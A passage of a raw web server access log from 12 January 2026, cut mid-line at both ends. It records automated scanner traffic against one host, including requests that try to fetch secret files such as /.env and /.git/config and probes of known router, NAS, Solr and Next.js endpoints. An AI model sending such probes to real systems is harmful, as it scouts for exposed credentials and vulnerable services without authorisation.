x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[12/Jan/2026:14:11:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:14:21:20 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:14:21:20 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 193.142.147.209] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:14:22:56 +0000] 404 - GET http 92.249.249.197 "/cgi/conf.bin" [Client 194.50.16.253] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11" "http://92.249.249.197:80/mainFrame.htm" +[12/Jan/2026:14:38:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:14:41:19 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:14:41:21 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:14:41:25 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:14:41:29 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:14:41:29 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[12/Jan/2026:14:41:34 +0000] 400 - POST http 92.249.249.197 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[12/Jan/2026:14:41:37 +0000] 400 - POST http 92.249.249.197 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[12/Jan/2026:14:41:40 +0000] 400 - GET http 92.249.249.197 "/WuEL" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)" "-" +[12/Jan/2026:14:41:46 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:14:41:46 +0000] 400 - GET http 92.249.249.197 "/a" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[12/Jan/2026:14:41:49 +0000] 400 - GET http 92.249.249.197 "/download/file.ext" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[12/Jan/2026:14:41:50 +0000] 400 - GET http 92.249.249.197 "/SiteLoader" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[12/Jan/2026:14:42:11 +0000] 400 - GET http 92.249.249.197 "/mPlayer" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[12/Jan/2026:14:42:18 +0000] 400 - POST http 92.249.249.197 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[12/Jan/2026:14:42:20 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.91.69.5] [Length 632] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[12/Jan/2026:14:45:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:14:46:54 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:14:55:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:15:01:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:15:11:29 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 64.225.101.186] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:15:11:29 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 64.225.101.186] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:15:11:29 +0000] 404 - GET http 92.249.249.197 "/odinhttpcall1768230689" [Client 64.225.101.186] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:15:11:29 +0000] 404 - POST http 92.249.249.197 "/sdk" [Client 64.225.101.186] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:15:11:29 +0000] 404 - GET http 92.249.249.197 "/HNAP1" [Client 64.225.101.186] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:15:11:29 +0000] 404 - GET http 92.249.249.197 "/evox/about" [Client 64.225.101.186] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:15:11:29 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 64.225.101.186] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:15:11:29 +0000] 200 - GET http 92.249.249.197 "/" [Client 64.225.101.186] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:15:11:29 +0000] 404 - GET http 92.249.249.197 "/query?q=SHOW+DIAGNOSTICS" [Client 207.154.204.178] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:15:11:29 +0000] 404 - GET http 92.249.249.197 "/solr/admin/info/system" [Client 157.230.116.91] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:15:11:29 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/authLogin.cgi" [Client 164.90.216.252] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:15:11:29 +0000] 404 - GET http 92.249.249.197 "/v2/_catalog" [Client 64.226.92.143] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:15:11:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 46.101.108.210] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:15:11:29 +0000] 404 - GET http 92.249.249.197 "/solr/admin/cores?action=STATUS&wt=json" [Client 157.230.116.91] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:15:11:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 46.101.108.210] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:15:11:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 134.209.224.40] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:15:11:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 165.22.78.221] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[12/Jan/2026:15:11:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 165.22.78.221] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:15:11:34 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[12/Jan/2026:15:19:57 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" +[12/Jan/2026:15:23:29 +0000] 400 - - http localhost "-" [Client 20.12.240.9] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:15:29:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:15:50:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:15:51:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.71] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[12/Jan/2026:15:52:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:15:54:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 46.13.218.28] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:16:05:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[12/Jan/2026:16:05:20 +0000] 400 - GET http 92.249.249.197 "/.env" [Client 164.90.145.163] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[12/Jan/2026:16:05:21 +0000] 400 - GET http 92.249.249.197 "/.git/config" [Client 164.90.145.163] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[12/Jan/2026:16:15:54 +0000] 200 - GET http 92.249.249.197 "/" [Client 103.252.89.75] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:16:18:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:16:18:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:16:39:45 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:16:39:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 193.142.147.209] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:16:42:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:16:43:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:16:47:19 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:17:08:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:17:18:16 +0000] 400 - GET http 92.249.249.197 "/" [Client 162.142.125.220] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[12/Jan/2026:17:18:17 +0000] 400 - - http localhost "-" [Client 162.142.125.220] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:17:18:22 +0000] 400 - GET http 92.249.249.197 "/robots.txt" [Client 162.142.125.220] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[12/Jan/2026:17:31:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 34.77.70.250] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[12/Jan/2026:17:35:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:17:36:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:17:45:51 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:17:49:54 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 193.142.147.209] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:17:50:10 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:17:56:43 +0000] 400 - GET http 92.249.249.197 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" +[12/Jan/2026:17:57:08 +0000] 404 - POST http 92.249.249.197 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://92.249.249.197:80/home.asp" +[12/Jan/2026:17:57:25 +0000] 400 - GET http 92.249.249.197 "/index.htm" [Client 45.194.92.18] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[12/Jan/2026:17:57:25 +0000] 400 - GET http 92.249.249.197 "/" [Client 45.194.92.18] [Length 252] [Gzip -] "-" "-" +[12/Jan/2026:17:58:29 +0000] 400 - - http localhost "-" [Client 45.194.92.18] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:18:00:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:18:12:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 165.232.77.35] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:18:19:32 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 137.184.18.209] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[12/Jan/2026:18:19:32 +0000] 400 - GET http profibot.direct.quickconnect.to "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[12/Jan/2026:18:22:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:18:29:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:18:44:25 +0000] 404 - POST http 92.249.249.197 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://92.249.249.197:80/home.asp" +[12/Jan/2026:18:47:54 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:18:57:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 54.196.51.78] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[12/Jan/2026:19:03:55 +0000] 400 - GET http localhost "/" [Client 80.82.70.133] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15" "-" +[12/Jan/2026:19:04:45 +0000] 400 - GET http 92.249.249.197 "/" [Client 80.82.77.202] [Length 252] [Gzip -] "fasthttp" "-" +[12/Jan/2026:19:04:45 +0000] 400 - GET http 92.249.249.197 "/aaa9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[12/Jan/2026:19:04:45 +0000] 400 - GET http 92.249.249.197 "/aab9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[12/Jan/2026:19:05:03 +0000] 400 - GET http 92.249.249.197 "/aaa9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[12/Jan/2026:19:05:03 +0000] 400 - GET http 92.249.249.197 "/aab9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[12/Jan/2026:19:05:48 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:19:14:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:19:15:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:19:20:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 103.252.89.75] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:19:26:31 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:19:40:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:19:54:27 +0000] 405 - POST http 92.249.249.197 "/" [Client 87.121.84.24] [Length 556] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[12/Jan/2026:19:54:32 +0000] 404 - POST http 92.249.249.197 "/_next" [Client 87.121.84.24] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[12/Jan/2026:19:54:37 +0000] 404 - POST http 92.249.249.197 "/api" [Client 87.121.84.24] [Length 122] [Gzip 1.35] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1" "-" +[12/Jan/2026:19:54:42 +0000] 404 - POST http 92.249.249.197 "/_next/server" [Client 87.121.84.24] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36" "-" +[12/Jan/2026:19:54:47 +0000] 404 - POST http 92.249.249.197 "/app" [Client 87.121.84.24] [Length 122] [Gzip 1.35] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1" "-" +[12/Jan/2026:19:54:50 +0000] 404 - POST http 92.249.249.197 "/api/route" [Client 87.121.84.24] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[12/Jan/2026:20:05:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:20:09:34 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:20:09:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 193.142.147.209] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:20:11:42 +0000] 200 - HEAD http profibot.direct.quickconnect.to "/" [Client 176.65.148.161] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[12/Jan/2026:20:11:43 +0000] 206 - GET http profibot.direct.quickconnect.to "/" [Client 176.65.148.161] [Length 1033] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[12/Jan/2026:20:11:43 +0000] 404 - HEAD http profibot.direct.quickconnect.to "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[12/Jan/2026:20:18:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:20:24:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 35.216.254.237] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:20:24:55 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 35.216.254.237] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:20:24:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 35.216.254.237] [Length 1033] [Gzip -] "abuse.xmco.fr" "-" +[12/Jan/2026:20:24:55 +0000] 404 - GET http 92.249.249.197 "/telescope/requests" [Client 35.216.254.237] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" "-" +[12/Jan/2026:20:24:55 +0000] 404 - GET http 92.249.249.197 "/info.php" [Client 35.216.254.237] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" "-" +[12/Jan/2026:20:24:55 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 35.216.254.237] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" "-" +[12/Jan/2026:20:24:55 +0000] 404 - GET http 92.249.249.197 "/server-status" [Client 35.216.254.237] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" "-" +[12/Jan/2026:20:24:55 +0000] 404 - GET http 92.249.249.197 "/config.json" [Client 35.216.254.237] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" "-" +[12/Jan/2026:20:24:55 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 35.216.254.237] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" "-" +[12/Jan/2026:20:29:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:20:47:20 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 45.91.64.8] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.100.4896.127 Safari/537.36" "-" +[12/Jan/2026:20:47:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:20:48:21 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 46.161.50.108] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:20:48:21 +0000] 404 - GET http 92.249.249.197 "/aaa9" [Client 46.161.50.108] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[12/Jan/2026:20:48:21 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 46.161.50.108] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:20:48:21 +0000] 404 - GET http 92.249.249.197 "/aab9" [Client 46.161.50.108] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[12/Jan/2026:20:54:51 